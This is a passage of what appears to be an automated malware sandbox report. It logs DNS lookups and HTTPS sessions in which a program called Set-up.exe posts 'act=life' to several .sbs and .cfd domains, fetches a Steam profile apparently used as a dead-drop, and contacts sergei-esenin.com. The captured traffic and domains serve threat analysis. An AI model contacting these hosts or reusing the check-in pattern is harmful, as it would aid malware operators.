Oct 13, 2024 11:42:18.960890055 CEST	192.168.2.4	1.1.1.1	0xe65a	Standard query (0)	condifendteu.sbs	A (IP address)	IN (0x0001)	false
Oct 13, 2024 11:42:19.899655104 CEST	192.168.2.4	1.1.1.1	0x3e70	Standard query (0)	drawwyobstacw.sbs	A (IP address)	IN (0x0001)	false
Oct 13, 2024 11:42:20.876852989 CEST	192.168.2.4	1.1.1.1	0xde34	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Oct 13, 2024 11:42:22.311084986 CEST	192.168.2.4	1.1.1.1	0xb5e6	Standard query (0)	sergei-esenin.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 13, 2024 11:42:12.773340940 CEST	1.1.1.1	192.168.2.4	0x9a73	No error (0)	sippymroat.cfd		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 13, 2024 11:42:12.773340940 CEST	1.1.1.1	192.168.2.4	0x9a73	No error (0)	sippymroat.cfd		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 13, 2024 11:42:13.819078922 CEST	1.1.1.1	192.168.2.4	0x86e4	No error (0)	mathcucom.sbs		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 13, 2024 11:42:13.819078922 CEST	1.1.1.1	192.168.2.4	0x86e4	No error (0)	mathcucom.sbs		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 13, 2024 11:42:14.771998882 CEST	1.1.1.1	192.168.2.4	0x2f86	Name error (3)	allocatinow.sbs	none	none	A (IP address)	IN (0x0001)	false
Oct 13, 2024 11:42:14.809382915 CEST	1.1.1.1	192.168.2.4	0xcc4	No error (0)	enlargkiw.sbs		172.67.152.13	A (IP address)	IN (0x0001)	false
Oct 13, 2024 11:42:14.809382915 CEST	1.1.1.1	192.168.2.4	0xcc4	No error (0)	enlargkiw.sbs		104.21.33.249	A (IP address)	IN (0x0001)	false
Oct 13, 2024 11:42:15.849775076 CEST	1.1.1.1	192.168.2.4	0x1868	No error (0)	resinedyw.sbs		104.21.77.78	A (IP address)	IN (0x0001)	false
Oct 13, 2024 11:42:15.849775076 CEST	1.1.1.1	192.168.2.4	0x1868	No error (0)	resinedyw.sbs		172.67.205.156	A (IP address)	IN (0x0001)	false
Oct 13, 2024 11:42:16.825871944 CEST	1.1.1.1	192.168.2.4	0x3008	No error (0)	vennurviot.sbs		172.67.140.193	A (IP address)	IN (0x0001)	false
Oct 13, 2024 11:42:16.825871944 CEST	1.1.1.1	192.168.2.4	0x3008	No error (0)	vennurviot.sbs		104.21.46.170	A (IP address)	IN (0x0001)	false
Oct 13, 2024 11:42:18.040107012 CEST	1.1.1.1	192.168.2.4	0x563c	No error (0)	ehticsprocw.sbs		104.21.30.221	A (IP address)	IN (0x0001)	false
Oct 13, 2024 11:42:18.040107012 CEST	1.1.1.1	192.168.2.4	0x563c	No error (0)	ehticsprocw.sbs		172.67.173.224	A (IP address)	IN (0x0001)	false
Oct 13, 2024 11:42:18.979465961 CEST	1.1.1.1	192.168.2.4	0xe65a	No error (0)	condifendteu.sbs		172.67.141.136	A (IP address)	IN (0x0001)	false
Oct 13, 2024 11:42:18.979465961 CEST	1.1.1.1	192.168.2.4	0xe65a	No error (0)	condifendteu.sbs		104.21.79.35	A (IP address)	IN (0x0001)	false
Oct 13, 2024 11:42:19.913213968 CEST	1.1.1.1	192.168.2.4	0x3e70	No error (0)	drawwyobstacw.sbs		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 13, 2024 11:42:19.913213968 CEST	1.1.1.1	192.168.2.4	0x3e70	No error (0)	drawwyobstacw.sbs		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 13, 2024 11:42:20.884628057 CEST	1.1.1.1	192.168.2.4	0xde34	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Oct 13, 2024 11:42:22.321085930 CEST	1.1.1.1	192.168.2.4	0xb5e6	No error (0)	sergei-esenin.com		104.21.53.8	A (IP address)	IN (0x0001)	false
Oct 13, 2024 11:42:22.321085930 CEST	1.1.1.1	192.168.2.4	0xb5e6	No error (0)	sergei-esenin.com		172.67.206.204	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

sippymroat.cfd

mathcucom.sbs

enlargkiw.sbs

resinedyw.sbs

vennurviot.sbs

ehticsprocw.sbs

condifendteu.sbs

drawwyobstacw.sbs

steamcommunity.com

sergei-esenin.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	188.114.97.3	443	1012	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-13 09:42:13 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: sippymroat.cfd
2024-10-13 09:42:13 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-13 09:42:13 UTC	821	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 09:42:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=04dcnsjaopkv169ee6eke0qedq; expires=Thu, 06 Feb 2025 03:28:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nmOjOaRXcXXUWYmsC6ebRMPtOo2Jp4RQyynnDYLLqMbkC5UmwEk72IJUzrcVBV4FMZZBk2N%2F3vjFPRPAMmqySWYm27JqxA%2FbvUh4PqnK16HvVLBFlr4n1bl6QigmvpxsBA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d1e60ddce254295-EWR alt-svc: h3=":443"; ma=86400
2024-10-13 09:42:13 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-13 09:42:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	188.114.96.3	443	1012	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-13 09:42:14 UTC	260	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: mathcucom.sbs
2024-10-13 09:42:14 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-13 09:42:14 UTC	817	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 09:42:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=n2mo4vee0smmdq23cgam5ms22c; expires=Thu, 06 Feb 2025 03:28:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DT5D0PzeAdBS%2BezR0oZIRdhBPkjGwVvcR79UKdKqzHqKZTNcTQh0WD6u04vL4BeyOC9kW05lP%2By3AB6%2BaPzuY2mj3QWTcXxtRwiDJZMd4EXxTa0kn%2FT5eX5qMYP2url4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d1e60e3f833186d-EWR alt-svc: h3=":443"; ma=86400
2024-10-13 09:42:14 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-13 09:42:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49733	172.67.152.13	443	1012	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-13 09:42:15 UTC	260	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: enlargkiw.sbs
2024-10-13 09:42:15 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-13 09:42:15 UTC	815	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 09:42:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=g1kfpfdn7ms947ie8h0pukol84; expires=Thu, 06 Feb 2025 03:28:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mp1yqCa48sn5CXG2%2F6VFiP9O7V%2B8ccHHgTEFHKtvqUWnevSR8JenwgA91Hs7v83FGoNduMFddynjI4Ymg21xc65pbSl8WWCtoFUgONRg2dKUfzAxwzHQ%2FGuk70tSCjdo"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d1e60ea1e578ca1-EWR alt-svc: h3=":443"; ma=86400
2024-10-13 09:42:15 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-13 09:42:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49734	104.21.77.78	443	1012	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-13 09:42:16 UTC	260	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: resinedyw.sbs
2024-10-13 09:42:16 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-13 09:42:16 UTC	813	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 09:42:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=q3havsfihggekrnhuv7lut88b3; expires=Thu, 06 Feb 2025 03:28:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XgrJXrzzisiDNkBJDTTNy0vCPtC8dkytug210Gz9xTUotyjd0rEAsAYH9hMgs0AYGtrjkA9885B%2BIovcmGVGzKjNQ9SHyhpues0nOb05Xx5%2BLI5ShqQH9I6421D9xykG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d1e60f07e5442c4-EWR alt-svc: h3=":443"; ma=86400
2024-10-13 09:42:16 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-13 09:42:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49735	172.67.140.193	443	1012	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-13 09:42:17 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: vennurviot.sbs
2024-10-13 09:42:17 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-13 09:42:17 UTC	819	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 09:42:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=imqen4sn7kcqst60ngo2nritus; expires=Thu, 06 Feb 2025 03:28:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WvfbProCgEPqveLcpGQm6UVNM%2BhTyRGrAhNbeGDxhtmhv4kmS4AOUxGlXXRwc648ohQt7gsBzVXCnui9fUPowOQaGpEwOl3nic5wT20P6rNlJ4CwnTkJ0ab1LkoDybqe3Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d1e60f84df28c9b-EWR alt-svc: h3=":443"; ma=86400
2024-10-13 09:42:17 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-13 09:42:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49737	104.21.30.221	443	1012	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-13 09:42:18 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: ehticsprocw.sbs
2024-10-13 09:42:18 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-13 09:42:18 UTC	831	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 09:42:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=smfqi94d6qbu36na6q1m648d0d; expires=Thu, 06 Feb 2025 03:28:57 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nmD%2B5XfnouPEMok%2BuuaY%2FuPq4Mj4Fqeu6sf0q64Z10Z6gH%2F4V30s2UmjL6Sfxk2Ts8GBoIEW%2F%2Fuq%2BMHWDxFcFvjJQRxxuEtzmDv5p4J7l%2Borej2qDj3SUsZTeYkoAWNeHeA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d1e60fe381c4259-EWR alt-svc: h3=":443"; ma=86400
2024-10-13 09:42:18 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-13 09:42:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49741	172.67.141.136	443	1012	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-13 09:42:19 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: condifendteu.sbs
2024-10-13 09:42:19 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-13 09:42:19 UTC	817	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 09:42:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=hlitpme5vvs0d7ols4vuccb0c9; expires=Thu, 06 Feb 2025 03:28:58 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=stKaRUzRf2hgXZKmTKUjWe6lpexiAg7A7yf3hNsLs1M%2FMfEHMB67QvcOwtSa3av21TRZ5Z8g4y5xkwguw0burtD2LXWnU8bzQsCcpx8MATuP0rCszhVlFq%2B1f4ukwACPPtiP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d1e61041e48de96-EWR alt-svc: h3=":443"; ma=86400
2024-10-13 09:42:19 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-13 09:42:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49743	188.114.96.3	443	1012	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-13 09:42:20 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: drawwyobstacw.sbs
2024-10-13 09:42:20 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-13 09:42:20 UTC	827	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 09:42:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bt2qkpqge1c1kvtfv6vnungpom; expires=Thu, 06 Feb 2025 03:28:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZTBnNKXFeklJNAH6tKKJ0%2FRO8q0ZRssaOHnc4Y%2F6hnkBrUrA9HiAHhraXv3uW2Z%2Bxf1UuxB8zyGphmZpqiByp3KvSlUcVz7chKA8sVNeLeOdbkCqYki0SRbDuKT7EaQNnyNT9Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d1e610a2ac91a0b-EWR alt-svc: h3=":443"; ma=86400
2024-10-13 09:42:20 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-13 09:42:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49745	104.102.49.254	443	1012	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-13 09:42:21 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-10-13 09:42:22 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Sun, 13 Oct 2024 09:42:22 GMT Content-Length: 34837 Connection: close Set-Cookie: sessionid=3842f22e652dc505c877dc1a; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-10-13 09:42:22 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-10-13 09:42:22 UTC	16384	IN	Data Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
2024-10-13 09:42:22 UTC	3768	IN	Data Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 Data Ascii: <div class="profile_summary_footer"><span data-panel="{"focusable":true,"clickOnActivate":true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
2024-10-13 09:42:22 UTC	171	IN	Data Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49746	104.21.53.8	443	1012	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-13 09:42:22 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: sergei-esenin.com
2024-10-13 09:42:22 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-13 09:42:23 UTC	563	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 09:42:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oSEg6nsrZk6Cc9RXy%2BsI6Zitz7d43ZNXVcUBa0uhrVErdRcnTSCQzh5Mq3Mw8%2Fckb1o%2B%2FzYb9hCl%2F%2FkKvuQxrv9L8V9XqxvVem57TTMqGoTwALsRbbHPaGuHg%2FT6DCg%2FSEstWQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d1e6118fbc042aa-EWR
